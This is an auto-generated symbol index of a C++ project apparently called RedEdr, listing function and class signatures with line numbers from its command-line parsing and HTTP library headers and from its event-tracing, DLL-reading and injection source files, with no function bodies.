method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method ParseResult (line 1698) | ParseResult() = default;
method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
method Iterator (line 1714) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method Iterator (line 1720) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method count (line 1726) | std::size_t
method OptionValue (line 1745) | const OptionValue&
method as_optional (line 1767) | std::optional<T>
method arguments_string (line 1801) | const std::string
function String (line 2751) | inline
function HelpGroupDetails (line 2899) | inline
type std (line 267) | namespace std {
function begin (line 269) | inline
function end (line 276) | inline
type cxxopts (line 288) | namespace cxxopts {
function String (line 144) | inline
class UnicodeStringIterator (line 156) | class UnicodeStringIterator
method UnicodeStringIterator (line 166) | UnicodeStringIterator(const icu::UnicodeString* string, int32_t pos)
method value_type (line 172) | value_type
method UnicodeStringIterator (line 190) | UnicodeStringIterator&
method UnicodeStringIterator (line 197) | UnicodeStringIterator
function CXXOPTS_DIAGNOSTIC_POP (line 207) | CXXOPTS_DIAGNOSTIC_POP
function String (line 216) | inline
function String (line 229) | String&
function stringLength (line 241) | inline
function toUTF8String (line 248) | inline
function empty (line 258) | inline
function T (line 293) | T
function stringLength (line 299) | inline
function String (line 306) | inline
function String (line 313) | inline
function String (line 321) | String&
function toUTF8String (line 328) | std::string
function empty (line 334) | inline
class Value (line 362) | class Value : public std::enable_shared_from_this<Value>
function CXXOPTS_DIAGNOSTIC_POP (line 409) | CXXOPTS_DIAGNOSTIC_POP
function throw_or_mimic (line 565) | void throw_or_mimic(const std::string& text)
type values (line 585) | namespace values {
type parser_tool (line 587) | namespace parser_tool {
type IntegerDesc (line 589) | struct IntegerDesc
type ArguDesc (line 595) | struct ArguDesc {
function IntegerDesc (line 603) | inline IntegerDesc SplitInteger(const std::string& text)
function IsTrueText (line 632) | inline bool IsTrueText(const std::string& text)
function IsFalseText (line 650) | inline bool IsFalseText(const std::string& text)
function OptionNames (line 668) | inline OptionNames split_option_names(const std::string& text)
function ArguDesc (line 714) | inline ArguDesc ParseArgument(const char* arg, bool& matched)
function IntegerDesc (line 787) | inline IntegerDesc SplitInteger(const std::string& text)
function IsTrueText (line 814) | inline bool IsTrueText(const std::string& text)
function IsFalseText (line 822) | inline bool IsFalseText(const std::string& text)
function OptionNames (line 833) | inline OptionNames split_option_names(const std::string& text)
function ArguDesc (line 851) | inline ArguDesc ParseArgument(const char* arg, bool& matched)
type detail (line 877) | namespace detail {
type SignedCheck (line 880) | struct SignedCheck
type SignedCheck<T, true> (line 883) | struct SignedCheck<T, true>
type SignedCheck<T, false> (line 907) | struct SignedCheck<T, false>
function check_signed_range (line 915) | void
function checked_negate (line 924) | void
function checked_negate (line 934) | void
function integer_parser (line 941) | void
function stringstream_parser (line 1011) | void stringstream_parser(const std::string& text, T& value)
function parse_value (line 1023) | void parse_value(const std::string& text, T& value)
function parse_value (line 1028) | inline
function parse_value (line 1047) | inline
function parse_value (line 1060) | void
function parse_value (line 1067) | void
function parse_value (line 1076) | inline
function parse_value (line 1088) | void
function add_value (line 1107) | void
function add_value (line 1114) | void
type type_is_container (line 1123) | struct type_is_container
type type_is_container<std::vector<T>> (line 1129) | struct type_is_container<std::vector<T>>
class abstract_value (line 1135) | class abstract_value : public Value
method abstract_value (line 1140) | abstract_value()
method abstract_value (line 1146) | explicit abstract_value(T* t)
method abstract_value (line 1153) | abstract_value& operator=(const abstract_value&) = default;
method abstract_value (line 1155) | abstract_value(const abstract_value& rhs)
method add (line 1173) | void
method parse (line 1179) | void
method is_container (line 1185) | bool
method parse (line 1191) | void
method has_default (line 1197) | bool
method has_implicit (line 1203) | bool
method default_value (line 1209) | std::shared_ptr<Value>
method implicit_value (line 1217) | std::shared_ptr<Value>
method no_implicit_value (line 1225) | std::shared_ptr<Value>
method get_default_value (line 1232) | std::string
method get_implicit_value (line 1238) | std::string
method is_boolean (line 1244) | bool
method T (line 1250) | const T&
class standard_value (line 1272) | class standard_value : public abstract_value<T>
method override (line 1279) | const override
class standard_value<bool> (line 1286) | class standard_value<bool> : public abstract_value<bool>
method standard_value (line 1291) | standard_value()
method standard_value (line 1296) | explicit standard_value(bool* b)
method clone (line 1303) | std::shared_ptr<Value>
method set_default_and_implicit (line 1311) | void
function value (line 1324) | std::shared_ptr<Value>
function value (line 1331) | std::shared_ptr<Value>
class OptionAdder (line 1337) | class OptionAdder
method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
function CXXOPTS_NODISCARD (line 1339) | CXXOPTS_NODISCARD
class OptionDetails (line 1348) | class OptionDetails
method OptionDetails (line 1351) | OptionDetails
method OptionDetails (line 1367) | OptionDetails(const OptionDetails& rhs)
method OptionDetails (line 1374) | OptionDetails(OptionDetails&& rhs) = default;
method CXXOPTS_NODISCARD (line 1376) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1383) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1389) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1396) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1403) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1410) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1417) | CXXOPTS_NODISCARD
method hash (line 1424) | std::size_t
type HelpOptionDetails (line 1440) | struct HelpOptionDetails
type HelpGroupDetails (line 1454) | struct HelpGroupDetails
class OptionValue (line 1461) | class OptionValue
method add (line 1464) | void
method parse (line 1477) | void
method parse_default (line 1490) | void
method parse_no_value (line 1499) | void
method noexcept (line 1512) | const noexcept
method CXXOPTS_NODISCARD (line 1522) | CXXOPTS_NODISCARD
method T (line 1530) | const T&
method as_optional (line 1543) | std::optional<T>
method ensure_value (line 1554) | void
class KeyValue (line 1572) | class KeyValue
method KeyValue (line 1575) | KeyValue(std::string key_, std::string value_) noexcept
method CXXOPTS_NODISCARD (line 1581) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1588) | CXXOPTS_NODISCARD
method T (line 1596) | T
class ParseResult (line 1612) | class ParseResult
class Iterator (line 1615) | class Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method ParseResult (line 1698) | ParseResult() = default;
method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
method Iterator (line 1714) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method Iterator (line 1720) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method count (line 1726) | std::size_t
method OptionValue (line 1745) | const OptionValue&
method as_optional (line 1767) | std::optional<T>
method arguments_string (line 1801) | const std::string
type Option (line 1824) | struct Option
method Option (line 1826) | Option
class OptionParser (line 1850) | class OptionParser
method OptionParser (line 1853) | OptionParser(const OptionMap& options, const PositionalList& positio...
class Options (line 1908) | class Options
method Options (line 1912) | explicit Options(std::string program_name, std::string help_string =...
method Options (line 1925) | Options&
method Options (line 1932) | Options&
method Options (line 1939) | Options&
method Options (line 1946) | Options&
method Options (line 1953) | Options&
method Options (line 1960) | Options&
method add_option (line 1998) | void
method parse_positional (line 2025) | void
class OptionAdder (line 2084) | class OptionAdder
method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
function String (line 2112) | String
function String (line 2158) | String
function OptionAdder (line 2303) | inline
method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
function OptionAdder (line 2310) | inline
method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
function ParseResult (line 2487) | inline
class Iterator (line 1615) | class Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method ParseResult (line 1698) | ParseResult() = default;
method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
method Iterator (line 1714) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method Iterator (line 1720) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method count (line 1726) | std::size_t
method OptionValue (line 1745) | const OptionValue&
method as_optional (line 1767) | std::optional<T>
method arguments_string (line 1801) | const std::string
function ParseResult (line 2496) | inline ParseResult
class Iterator (line 1615) | class Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method ParseResult (line 1698) | ParseResult() = default;
method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
method Iterator (line 1714) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method Iterator (line 1720) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method count (line 1726) | std::size_t
method OptionValue (line 1745) | const OptionValue&
method as_optional (line 1767) | std::optional<T>
method arguments_string (line 1801) | const std::string
function String (line 2751) | inline
function HelpGroupDetails (line 2899) | inline
type cxxopts (line 346) | namespace cxxopts {
function String (line 144) | inline
class UnicodeStringIterator (line 156) | class UnicodeStringIterator
method UnicodeStringIterator (line 166) | UnicodeStringIterator(const icu::UnicodeString* string, int32_t pos)
method value_type (line 172) | value_type
method UnicodeStringIterator (line 190) | UnicodeStringIterator&
method UnicodeStringIterator (line 197) | UnicodeStringIterator
function CXXOPTS_DIAGNOSTIC_POP (line 207) | CXXOPTS_DIAGNOSTIC_POP
function String (line 216) | inline
function String (line 229) | String&
function stringLength (line 241) | inline
function toUTF8String (line 248) | inline
function empty (line 258) | inline
function T (line 293) | T
function stringLength (line 299) | inline
function String (line 306) | inline
function String (line 313) | inline
function String (line 321) | String&
function toUTF8String (line 328) | std::string
function empty (line 334) | inline
class Value (line 362) | class Value : public std::enable_shared_from_this<Value>
function CXXOPTS_DIAGNOSTIC_POP (line 409) | CXXOPTS_DIAGNOSTIC_POP
function throw_or_mimic (line 565) | void throw_or_mimic(const std::string& text)
type values (line 585) | namespace values {
type parser_tool (line 587) | namespace parser_tool {
type IntegerDesc (line 589) | struct IntegerDesc
type ArguDesc (line 595) | struct ArguDesc {
function IntegerDesc (line 603) | inline IntegerDesc SplitInteger(const std::string& text)
function IsTrueText (line 632) | inline bool IsTrueText(const std::string& text)
function IsFalseText (line 650) | inline bool IsFalseText(const std::string& text)
function OptionNames (line 668) | inline OptionNames split_option_names(const std::string& text)
function ArguDesc (line 714) | inline ArguDesc ParseArgument(const char* arg, bool& matched)
function IntegerDesc (line 787) | inline IntegerDesc SplitInteger(const std::string& text)
function IsTrueText (line 814) | inline bool IsTrueText(const std::string& text)
function IsFalseText (line 822) | inline bool IsFalseText(const std::string& text)
function OptionNames (line 833) | inline OptionNames split_option_names(const std::string& text)
function ArguDesc (line 851) | inline ArguDesc ParseArgument(const char* arg, bool& matched)
type detail (line 877) | namespace detail {
type SignedCheck (line 880) | struct SignedCheck
type SignedCheck<T, true> (line 883) | struct SignedCheck<T, true>
type SignedCheck<T, false> (line 907) | struct SignedCheck<T, false>
function check_signed_range (line 915) | void
function checked_negate (line 924) | void
function checked_negate (line 934) | void
function integer_parser (line 941) | void
function stringstream_parser (line 1011) | void stringstream_parser(const std::string& text, T& value)
function parse_value (line 1023) | void parse_value(const std::string& text, T& value)
function parse_value (line 1028) | inline
function parse_value (line 1047) | inline
function parse_value (line 1060) | void
function parse_value (line 1067) | void
function parse_value (line 1076) | inline
function parse_value (line 1088) | void
function add_value (line 1107) | void
function add_value (line 1114) | void
type type_is_container (line 1123) | struct type_is_container
type type_is_container<std::vector<T>> (line 1129) | struct type_is_container<std::vector<T>>
class abstract_value (line 1135) | class abstract_value : public Value
method abstract_value (line 1140) | abstract_value()
method abstract_value (line 1146) | explicit abstract_value(T* t)
method abstract_value (line 1153) | abstract_value& operator=(const abstract_value&) = default;
method abstract_value (line 1155) | abstract_value(const abstract_value& rhs)
method add (line 1173) | void
method parse (line 1179) | void
method is_container (line 1185) | bool
method parse (line 1191) | void
method has_default (line 1197) | bool
method has_implicit (line 1203) | bool
method default_value (line 1209) | std::shared_ptr<Value>
method implicit_value (line 1217) | std::shared_ptr<Value>
method no_implicit_value (line 1225) | std::shared_ptr<Value>
method get_default_value (line 1232) | std::string
method get_implicit_value (line 1238) | std::string
method is_boolean (line 1244) | bool
method T (line 1250) | const T&
class standard_value (line 1272) | class standard_value : public abstract_value<T>
method override (line 1279) | const override
class standard_value<bool> (line 1286) | class standard_value<bool> : public abstract_value<bool>
method standard_value (line 1291) | standard_value()
method standard_value (line 1296) | explicit standard_value(bool* b)
method clone (line 1303) | std::shared_ptr<Value>
method set_default_and_implicit (line 1311) | void
function value (line 1324) | std::shared_ptr<Value>
function value (line 1331) | std::shared_ptr<Value>
class OptionAdder (line 1337) | class OptionAdder
method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
function CXXOPTS_NODISCARD (line 1339) | CXXOPTS_NODISCARD
class OptionDetails (line 1348) | class OptionDetails
method OptionDetails (line 1351) | OptionDetails
method OptionDetails (line 1367) | OptionDetails(const OptionDetails& rhs)
method OptionDetails (line 1374) | OptionDetails(OptionDetails&& rhs) = default;
method CXXOPTS_NODISCARD (line 1376) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1383) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1389) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1396) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1403) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1410) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1417) | CXXOPTS_NODISCARD
method hash (line 1424) | std::size_t
type HelpOptionDetails (line 1440) | struct HelpOptionDetails
type HelpGroupDetails (line 1454) | struct HelpGroupDetails
class OptionValue (line 1461) | class OptionValue
method add (line 1464) | void
method parse (line 1477) | void
method parse_default (line 1490) | void
method parse_no_value (line 1499) | void
method noexcept (line 1512) | const noexcept
method CXXOPTS_NODISCARD (line 1522) | CXXOPTS_NODISCARD
method T (line 1530) | const T&
method as_optional (line 1543) | std::optional<T>
method ensure_value (line 1554) | void
class KeyValue (line 1572) | class KeyValue
method KeyValue (line 1575) | KeyValue(std::string key_, std::string value_) noexcept
method CXXOPTS_NODISCARD (line 1581) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1588) | CXXOPTS_NODISCARD
method T (line 1596) | T
class ParseResult (line 1612) | class ParseResult
class Iterator (line 1615) | class Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method ParseResult (line 1698) | ParseResult() = default;
method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
method Iterator (line 1714) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method Iterator (line 1720) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method count (line 1726) | std::size_t
method OptionValue (line 1745) | const OptionValue&
method as_optional (line 1767) | std::optional<T>
method arguments_string (line 1801) | const std::string
type Option (line 1824) | struct Option
method Option (line 1826) | Option
class OptionParser (line 1850) | class OptionParser
method OptionParser (line 1853) | OptionParser(const OptionMap& options, const PositionalList& positio...
class Options (line 1908) | class Options
method Options (line 1912) | explicit Options(std::string program_name, std::string help_string =...
method Options (line 1925) | Options&
method Options (line 1932) | Options&
method Options (line 1939) | Options&
method Options (line 1946) | Options&
method Options (line 1953) | Options&
method Options (line 1960) | Options&
method add_option (line 1998) | void
method parse_positional (line 2025) | void
class OptionAdder (line 2084) | class OptionAdder
method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
function String (line 2112) | String
function String (line 2158) | String
function OptionAdder (line 2303) | inline
method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
function OptionAdder (line 2310) | inline
method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
function ParseResult (line 2487) | inline
class Iterator (line 1615) | class Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method ParseResult (line 1698) | ParseResult() = default;
method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
method Iterator (line 1714) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method Iterator (line 1720) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method count (line 1726) | std::size_t
method OptionValue (line 1745) | const OptionValue&
method as_optional (line 1767) | std::optional<T>
method arguments_string (line 1801) | const std::string
function ParseResult (line 2496) | inline ParseResult
class Iterator (line 1615) | class Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method ParseResult (line 1698) | ParseResult() = default;
method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
method Iterator (line 1714) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method Iterator (line 1720) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method count (line 1726) | std::size_t
method OptionValue (line 1745) | const OptionValue&
method as_optional (line 1767) | std::optional<T>
method arguments_string (line 1801) | const std::string
function String (line 2751) | inline
function HelpGroupDetails (line 2899) | inline
FILE: RedEdr/dllinjector.cpp
function BOOL (line 11) | BOOL remote_inject(DWORD target_pid) {
FILE: RedEdr/dllreader.cpp
function DllReaderInit (line 34) | bool DllReaderInit(std::vector<HANDLE>& threads) {
function DWORD (line 63) | DWORD WINAPI DllReaderThread(LPVOID param) {
function DllReaderClientThread (line 109) | void DllReaderClientThread(PipeServer* pipeServer) {
function DllReaderShutdown (line 159) | void DllReaderShutdown() {
FILE: RedEdr/etwreader.cpp
function trace_in_progress (line 25) | void trace_in_progress(BOOL use) {
function event_callback_process (line 32) | void event_callback_process(const EVENT_RECORD& record, const krabs::tra...
function event_callback_antimalware (line 65) | void event_callback_antimalware(const EVENT_RECORD& record, const krabs:...
function event_callback_defendertrace (line 136) | void event_callback_defendertrace(const EVENT_RECORD& record, const krab...
function BOOL (line 239) | BOOL InitializeEtwReader(std::vector<HANDLE>& threads) {
function DWORD (line 273) | DWORD WINAPI TraceProcessingThread(LPVOID param) {
function EtwReaderStopAll (line 459) | void EtwReaderStopAll() {
FILE: RedEdr/event_aggregator.cpp
function BOOL (line 63) | BOOL EventAggregator::HasMoreEvents() {
FILE: RedEdr/event_aggregator.h
function class (line 9) | class EventAggregator {
FILE: RedEdr/event_augmenter.cpp
function AugmentEvent (line 14) | void AugmentEvent(nlohmann::json& j, Process *process) {
function AugmentEventWithMemAddrInfo (line 19) | void AugmentEventWithMemAddrInfo(nlohmann::json& j, Process *process) {
FILE: RedEdr/event_processor.cpp
function DWORD (line 265) | DWORD WINAPI EventProcessorThread(LPVOID param) {
function InitializeEventProcessor (line 295) | int InitializeEventProcessor(std::vector<HANDLE>& threads) {
function StopEventProcessor (line 315) | void StopEventProcessor() {
FILE: RedEdr/event_processor.h
function class (line 12) | class EventProcessor {
FILE: RedEdr/httplib.h
function namespace (line 295) | namespace httplib {
function scope_exit (line 333) | struct scope_exit {
function release (line 347) | void release() { this->execute_on_destruction = false; }
type StatusCode (line 360) | enum StatusCode {
type Response (line 442) | struct Response
type MultipartFormData (line 445) | struct MultipartFormData {
function class (line 454) | class DataSink {
type MultipartFormDataProvider (line 495) | struct MultipartFormDataProvider {
function class (line 513) | class ContentReader {
function const (line 528) | bool operator()(ContentReceiver receiver) const {
type Request (line 539) | struct Request {
type Response (line 591) | struct Response {
function class (line 641) | class Stream {
function enqueue (line 684) | bool enqueue(std::function<void()> fn) override {
function shutdown (line 697) | void shutdown() override {
type worker (line 713) | struct worker {
function Error (line 1045) | enum class Error {
function class (line 1105) | class ClientImpl {
function getline (line 2771) | inline bool stream_line_reader::getline() {
function append (line 2797) | inline void stream_line_reader::append(char c) {
function mmap (line 2821) | inline mmap::~mmap() { close(); }
function open (line 2823) | inline bool mmap::open(const char *path) {
function close (line 2907) | inline void mmap::close() {
function close_socket (line 2936) | inline int close_socket(socket_t sock) {
function handle_EINTR (line 2944) | ssize_t handle_EINTR(T fn) {
function read_socket (line 2954) | inline ssize_t read_socket(socket_t sock, void *ptr, size_t size, int fl...
function socket_t (line 6473) | inline socket_t
function bind_internal (line 6489) | inline int Server::bind_internal(const std::string &host, int port,
function listen_internal (line 6515) | inline bool Server::listen_internal() {
function process_and_close_socket (line 6967) | inline bool Server::process_and_close_socket(socket_t sock) {
function copy_settings (line 7004) | inline void ClientImpl::copy_settings(const ClientImpl &rhs) {
function socket_t (line 7048) | inline socket_t ClientImpl::create_client_socket(Error &error) const {
function create_and_connect_socket (line 7069) | inline bool ClientImpl::create_and_connect_socket(Socket &socket,
function shutdown_ssl (line 7077) | inline void ClientImpl::shutdown_ssl(Socket & /*socket*/,
function shutdown_socket (line 7085) | inline void ClientImpl::shutdown_socket(Socket &socket) const {
function close_socket (line 7090) | inline void ClientImpl::close_socket(Socket &socket) {
function read_response_line (line 7109) | inline bool ClientImpl::read_response_line(Stream &strm, const Request &...
function send (line 7145) | inline bool ClientImpl::send(Request &req, Response &res, Error &error) {
function send_ (line 7155) | inline bool ClientImpl::send_(Request &req, Response &res, Error &error) {
function Result (line 7244) | inline Result ClientImpl::send(const Request &req) {
